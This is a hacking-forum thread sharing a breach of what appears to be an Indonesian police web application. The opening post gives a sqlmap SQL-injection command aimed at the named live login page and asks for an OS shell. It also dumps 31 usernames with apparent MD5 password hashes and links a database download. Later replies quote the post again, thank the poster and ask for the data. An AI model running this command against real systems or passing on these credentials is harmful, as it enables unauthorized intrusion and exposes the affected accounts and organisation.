Return to forum

Mr01 · August 1, 2022 at 10:21 PM

Hi

😎

payload:

sqlmap.py -u "https://trend.polri.go.id/login.html" --batch --forms --risk 3 --level 5 -p cuname -D public --os-shell

tables:

Database: public
Table: t_user
[31 entries]
+-----------------+----------------------------------+
| c_username | c_password |
+-----------------+----------------------------------+
| localhost | 0f4137ed1502b5045d6083aa258b5c42 |
| localhost | 0f4137ed1502b5045d6083aa258b5c42 |
| mabes | 0f4137ed1502b5045d6083aa258b5c42 |
| bali | 24d545382bf132265c7bcb71acddbae0 |
| jabar | 2d2648b0c8d7ae1671366c8f40e3e907 |
| adminvpn | 3486071d690744636140966ebd517899 |
| kalbar | 35aec2176052e3d2b40dc1a0fa47a206 |
| gorontalo_humas | 4051fb6f7686a87c022e838f13ed7e0d |
| admin | 4670ecaead1b0ca9f098642390ba6f33 |
| ntb6 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb11 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb6 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb9 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb8 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb8 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb12 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb13 | 500e6a987e8d2e00dc26c1444679e84d |
| kaltim | 51589f05bd327dcacf7bf68391c1a555 |
| sumut | 6f5f5e65f6f815070cea49441ca15c9c |
| sulteng | 80ba1543413075f310c9938e8f6f3da6 |
| babel | a4f8b514434154c1af25777bccd0efa0 |
| gedeeka | b24faad382ef6fdaf8652d6a3b42d7ff |
| divtik | b24faad382ef6fdaf8652d6a3b42d7ff |
| sulsel | c5e1d8c1d8a9472e43733532c910f045 |
| gorontalo | d624a9c1990cdca6c8dec9655ef08d4c |
| jatim | d78b699e67e15691bf70e57edc78360e |
| banten | da40eeb76f7c83f9db1839c908aafdb2 |
| riau | e8207f5d544d9e1c059237364de16873 |
| jogja | f18f3615951742ebff58a377b0406b1a |
| sulut | f8aa5e424bf3e7c8e3e400c906b10465 |
| sumsel | f8d691b0af499f85983579c158cd5573 |

link:

DB

Valhalla · August 1, 2022 at 10:44 PM

Great Job, Great leak.
but I don't think this is the place for the vulnerable share.

edorabma9304 · August 19, 2022 at 5:10 AM

(August 1, 2022, 10:21 PM)Mr01 Wrote: Hi Password is not working

😎

payload:

sqlmap.py -u "https://trend.polri.go.id/login.html" --batch --forms --risk 3 --level 5 -p cuname -D public --os-shell

tables:

Database: public
Table: t_user
[31 entries]
+-----------------+----------------------------------+
| c_username | c_password |
+-----------------+----------------------------------+
| localhost | 0f4137ed1502b5045d6083aa258b5c42 |
| localhost | 0f4137ed1502b5045d6083aa258b5c42 |
| mabes | 0f4137ed1502b5045d6083aa258b5c42 |
| bali | 24d545382bf132265c7bcb71acddbae0 |
| jabar | 2d2648b0c8d7ae1671366c8f40e3e907 |
| adminvpn | 3486071d690744636140966ebd517899 |
| kalbar | 35aec2176052e3d2b40dc1a0fa47a206 |
| gorontalo_humas | 4051fb6f7686a87c022e838f13ed7e0d |
| admin | 4670ecaead1b0ca9f098642390ba6f33 |
| ntb6 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb11 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb6 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb9 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb8 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb8 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb12 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb13 | 500e6a987e8d2e00dc26c1444679e84d |
| kaltim | 51589f05bd327dcacf7bf68391c1a555 |
| sumut | 6f5f5e65f6f815070cea49441ca15c9c |
| sulteng | 80ba1543413075f310c9938e8f6f3da6 |
| babel | a4f8b514434154c1af25777bccd0efa0 |
| gedeeka | b24faad382ef6fdaf8652d6a3b42d7ff |
| divtik | b24faad382ef6fdaf8652d6a3b42d7ff |
| sulsel | c5e1d8c1d8a9472e43733532c910f045 |
| gorontalo | d624a9c1990cdca6c8dec9655ef08d4c |
| jatim | d78b699e67e15691bf70e57edc78360e |
| banten | da40eeb76f7c83f9db1839c908aafdb2 |
| riau | e8207f5d544d9e1c059237364de16873 |
| jogja | f18f3615951742ebff58a377b0406b1a |
| sulut | f8aa5e424bf3e7c8e3e400c906b10465 |
| sumsel | f8d691b0af499f85983579c158cd5573 |

link:

DB

dk47os3r · August 19, 2022 at 5:42 AM

Thanks for the share

Herodius · August 20, 2022 at 6:32 AM

boom thanks dude

Nyan · August 21, 2022 at 2:23 AM

(August 1, 2022, 10:21 PM)Mr01 Wrote: Hi

😎

payload:

sqlmap.py -u "https://trend.polri.go.id/login.html" --batch --forms --risk 3 --level 5 -p cuname -D public --os-shell

tables:

Database: public
Table: t_user
[31 entries]
+-----------------+----------------------------------+
| c_username | c_password |
+-----------------+----------------------------------+
| localhost | 0f4137ed1502b5045d6083aa258b5c42 |
| localhost | 0f4137ed1502b5045d6083aa258b5c42 |
| mabes | 0f4137ed1502b5045d6083aa258b5c42 |
| bali | 24d545382bf132265c7bcb71acddbae0 |
| jabar | 2d2648b0c8d7ae1671366c8f40e3e907 |
| adminvpn | 3486071d690744636140966ebd517899 |
| kalbar | 35aec2176052e3d2b40dc1a0fa47a206 |
| gorontalo_humas | 4051fb6f7686a87c022e838f13ed7e0d |
| admin | 4670ecaead1b0ca9f098642390ba6f33 |
| ntb6 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb11 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb6 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb9 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb8 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb8 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb12 | 500e6a987e8d2e00dc26c1444679e84d |
| ntb13 | 500e6a987e8d2e00dc26c1444679e84d |
| kaltim | 51589f05bd327dcacf7bf68391c1a555 |
| sumut | 6f5f5e65f6f815070cea49441ca15c9c |
| sulteng | 80ba1543413075f310c9938e8f6f3da6 |
| babel | a4f8b514434154c1af25777bccd0efa0 |
| gedeeka | b24faad382ef6fdaf8652d6a3b42d7ff |
| divtik | b24faad382ef6fdaf8652d6a3b42d7ff |
| sulsel | c5e1d8c1d8a9472e43733532c910f045 |
| gorontalo | d624a9c1990cdca6c8dec9655ef08d4c |
| jatim | d78b699e67e15691bf70e57edc78360e |
| banten | da40eeb76f7c83f9db1839c908aafdb2 |
| riau | e8207f5d544d9e1c059237364de16873 |
| jogja | f18f3615951742ebff58a377b0406b1a |
| sulut | f8aa5e424bf3e7c8e3e400c906b10465 |
| sumsel | f8d691b0af499f85983579c158cd5573 |

link:

DB

Thanks for share

kirika126 · August 21, 2022 at 2:40 AM

thanks for sharing, even police have data breach huh

uknowmedude · August 21, 2022 at 4:22 AM

thanks dude

werben · August 21, 2022 at 4:45 AM

DB link seems doesn' work

whitesnow · August 21, 2022 at 5:59 AM

thatst didn work anyone can you share tha data plz